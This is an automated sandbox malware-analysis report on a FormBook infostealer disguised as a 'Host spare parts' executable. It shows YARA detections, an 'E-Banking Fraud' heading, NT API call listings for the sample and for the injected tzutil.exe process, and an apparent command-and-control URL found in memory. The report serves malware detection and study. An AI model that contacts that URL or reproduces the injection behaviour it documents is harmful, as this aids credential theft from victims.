                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: tzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
                      Source: tzutil.exe, 00000009.00000002.2605003324.0000000004098000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.0000000003548000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXg

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1938558348.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2603137890.0000000000F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2603506691.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2602984671.0000000001060000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2603358231.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1939504326.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0042C953 NtClose,4_2_0042C953
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2B60 NtClose,LdrInitializeThunk,4_2_011D2B60
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_011D2DF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_011D2C70
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D35C0 NtCreateMutant,LdrInitializeThunk,4_2_011D35C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D4340 NtSetContextThread,4_2_011D4340
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D4650 NtSuspendThread,4_2_011D4650
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2B80 NtQueryInformationFile,4_2_011D2B80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2BA0 NtEnumerateValueKey,4_2_011D2BA0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2BF0 NtAllocateVirtualMemory,4_2_011D2BF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2BE0 NtQueryValueKey,4_2_011D2BE0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2AB0 NtWaitForSingleObject,4_2_011D2AB0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2AD0 NtReadFile,4_2_011D2AD0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2AF0 NtWriteFile,4_2_011D2AF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2D10 NtMapViewOfSection,4_2_011D2D10
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2D00 NtSetInformationFile,4_2_011D2D00
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2D30 NtUnmapViewOfSection,4_2_011D2D30
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2DB0 NtEnumerateKey,4_2_011D2DB0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2DD0 NtDelayExecution,4_2_011D2DD0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2C00 NtQueryInformationProcess,4_2_011D2C00
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2C60 NtCreateKey,4_2_011D2C60
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2CA0 NtQueryInformationToken,4_2_011D2CA0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2CC0 NtQueryVirtualMemory,4_2_011D2CC0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2CF0 NtOpenProcess,4_2_011D2CF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2F30 NtCreateSection,4_2_011D2F30
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2F60 NtCreateProcessEx,4_2_011D2F60
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2F90 NtProtectVirtualMemory,4_2_011D2F90
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2FB0 NtResumeThread,4_2_011D2FB0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2FA0 NtQuerySection,4_2_011D2FA0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2FE0 NtCreateFile,4_2_011D2FE0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2E30 NtWriteVirtualMemory,4_2_011D2E30
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2E80 NtReadVirtualMemory,4_2_011D2E80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2EA0 NtAdjustPrivilegesToken,4_2_011D2EA0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2EE0 NtQueueApcThread,4_2_011D2EE0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D3010 NtOpenDirectoryObject,4_2_011D3010
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D3090 NtSetValueKey,4_2_011D3090
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D39B0 NtGetContextThread,4_2_011D39B0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D3D10 NtOpenProcessToken,4_2_011D3D10
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D3D70 NtOpenThread,4_2_011D3D70
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D4340 NtSetContextThread,LdrInitializeThunk,9_2_033D4340
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D4650 NtSuspendThread,LdrInitializeThunk,9_2_033D4650
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2B60 NtClose,LdrInitializeThunk,9_2_033D2B60
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_033D2BA0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_033D2BF0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2BE0 NtQueryValueKey,LdrInitializeThunk,9_2_033D2BE0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2AF0 NtWriteFile,LdrInitializeThunk,9_2_033D2AF0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2AD0 NtReadFile,LdrInitializeThunk,9_2_033D2AD0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2F30 NtCreateSection,LdrInitializeThunk,9_2_033D2F30
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2FB0 NtResumeThread,LdrInitializeThunk,9_2_033D2FB0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2FE0 NtCreateFile,LdrInitializeThunk,9_2_033D2FE0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_033D2E80
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2EE0 NtQueueApcThread,LdrInitializeThunk,9_2_033D2EE0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_033D2D30
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2D10 NtMapViewOfSection,LdrInitializeThunk,9_2_033D2D10
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_033D2DF0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2DD0 NtDelayExecution,LdrInitializeThunk,9_2_033D2DD0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_033D2C70
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2C60 NtCreateKey,LdrInitializeThunk,9_2_033D2C60
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_033D2CA0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D35C0 NtCreateMutant,LdrInitializeThunk,9_2_033D35C0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D39B0 NtGetContextThread,LdrInitializeThunk,9_2_033D39B0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2B80 NtQueryInformationFile,9_2_033D2B80
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2AB0 NtWaitForSingleObject,9_2_033D2AB0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2F60 NtCreateProcessEx,9_2_033D2F60
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2FA0 NtQuerySection,9_2_033D2FA0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2F90 NtProtectVirtualMemory,9_2_033D2F90
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2E30 NtWriteVirtualMemory,9_2_033D2E30
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2EA0 NtAdjustPrivilegesToken,9_2_033D2EA0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2D00 NtSetInformationFile,9_2_033D2D00
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2DB0 NtEnumerateKey,9_2_033D2DB0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2C00 NtQueryInformationProcess,9_2_033D2C00
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2CF0 NtOpenProcess,9_2_033D2CF0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D2CC0 NtQueryVirtualMemory,9_2_033D2CC0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D3010 NtOpenDirectoryObject,9_2_033D3010
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D3090 NtSetValueKey,9_2_033D3090
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D3D10 NtOpenProcessToken,9_2_033D3D10
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D3D70 NtOpenThread,9_2_033D3D70
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AC9480 NtCreateFile,9_2_00AC9480
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AC95F0 NtReadFile,9_2_00AC95F0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AC96E0 NtDeleteFile,9_2_00AC96E0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AC9780 NtClose,9_2_00AC9780
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AC98E0 NtAllocateVirtualMemory,9_2_00AC98E0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_02DBD3440_2_02DBD344
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_0722CFB80_2_0722CFB8
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_0722EEA00_2_0722EEA0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_072296090_2_07229609
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_072296180_2_07229618
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_072205600_2_07220560
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_072205590_2_07220559
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_0722B5C80_2_0722B5C8
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_072291E00_2_072291E0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_004189C34_2_004189C3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0041021B4_2_0041021B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_004012204_2_00401220
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_004102234_2_00410223
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_004022DE4_2_004022DE
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_004022E04_2_004022E0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00416BCE4_2_00416BCE
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00416BD34_2_00416BD3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_004104434_2_00410443
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0040E4634_2_0040E463
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0040E5B34_2_0040E5B3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0040262C4_2_0040262C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_004026304_2_00402630
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00402F504_2_00402F50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0042EF234_2_0042EF23
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011901004_2_01190100
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123A1184_2_0123A118
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012281584_2_01228158
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012601AA4_2_012601AA
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012581CC4_2_012581CC
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012320004_2_01232000
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125A3524_2_0125A352
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012603E64_2_012603E6
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AE3F04_2_011AE3F0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012402744_2_01240274
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012202C04_2_012202C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A05354_2_011A0535
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012605914_2_01260591
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012444204_2_01244420
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012524464_2_01252446
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0124E4F64_2_0124E4F6
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C47504_2_011C4750
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A07704_2_011A0770
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119C7C04_2_0119C7C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BC6E04_2_011BC6E0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B69624_2_011B6962
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0126A9A64_2_0126A9A6
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A29A04_2_011A29A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A28404_2_011A2840
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AA8404_2_011AA840
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011868B84_2_011868B8
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CE8F04_2_011CE8F0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125AB404_2_0125AB40
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01256BD74_2_01256BD7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA804_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AAD004_2_011AAD00
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123CD1F4_2_0123CD1F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B8DBF4_2_011B8DBF
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119ADE04_2_0119ADE0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0C004_2_011A0C00
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01240CB54_2_01240CB5
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01190CF24_2_01190CF2
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01242F304_2_01242F30
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C0F304_2_011C0F30
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011E2F284_2_011E2F28
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01214F404_2_01214F40
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121EFA04_2_0121EFA0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01192FC84_2_01192FC8
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011ACFE04_2_011ACFE0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125EE264_2_0125EE26
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0E594_2_011A0E59
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B2E904_2_011B2E90
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125CE934_2_0125CE93
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125EEDB4_2_0125EEDB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0126B16B4_2_0126B16B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118F1724_2_0118F172
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D516C4_2_011D516C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AB1B04_2_011AB1B0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125F0E04_2_0125F0E0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012570E94_2_012570E9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A70C04_2_011A70C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0124F0CC4_2_0124F0CC
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125132D4_2_0125132D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118D34C4_2_0118D34C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011E739A4_2_011E739A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A52A04_2_011A52A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012412ED4_2_012412ED
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BB2C04_2_011BB2C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012575714_2_01257571
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123D5B04_2_0123D5B0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125F43F4_2_0125F43F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011914604_2_01191460
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125F7B04_2_0125F7B0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012516CC4_2_012516CC
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012359104_2_01235910
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A99504_2_011A9950
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BB9504_2_011BB950
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120D8004_2_0120D800
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A38E04_2_011A38E0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125FB764_2_0125FB76
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BFB804_2_011BFB80
